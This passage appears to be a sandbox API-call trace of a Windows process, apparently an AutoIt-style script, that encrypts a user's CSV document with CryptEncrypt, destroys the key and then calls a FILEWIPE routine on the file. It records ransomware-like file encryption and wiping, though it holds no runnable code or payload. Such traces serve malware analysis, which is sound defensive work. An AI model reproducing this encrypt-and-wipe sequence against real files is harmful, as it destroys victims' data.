lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.486] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.487] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.487] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.487] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.488] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.492] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x16989, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x16990) returned 1 [0178.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.492] CharLowerBuffW (in: lpsz="byte[92561]", cchLength=0xb | out: lpsz="byte[92561]") returned 0xb [0178.492] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.494] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.494] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.496] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8c338*, pdwDataLen=0x87e820*=0x16989, dwBufLen=0x16990 | out: pbData=0xa8c338*, pdwDataLen=0x87e820*=0x16990) returned 1 [0178.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.497] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.499] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.499] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.518] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0178.518] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.518] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.518] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0178.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.518] CryptDestroyKey (hKey=0x90aed8) returned 1 [0178.519] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.519] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.519] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.519] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.519] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.519] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.520] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.520] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.520] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.520] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.520] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.520] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.520] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.520] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0178.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.520] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.520] FreeLibrary (hLibModule=0x74f20000) returned 1 [0178.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.520] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.536] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.539] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.539] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0178.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.539] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xe8234710, ftLastWriteTime.dwHighDateTime=0x1d5e071, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 0x90af58 [0178.539] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.540] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.540] CharLowerBuffW (in: lpsz="byte[92553]", cchLength=0xb | out: lpsz="byte[92553]") returned 0xb [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.542] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.542] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0178.542] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.542] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.542] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2858 [0178.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2858, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.543] FreeLibrary (hLibModule=0x75c90000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0178.543] HeapFree (in: 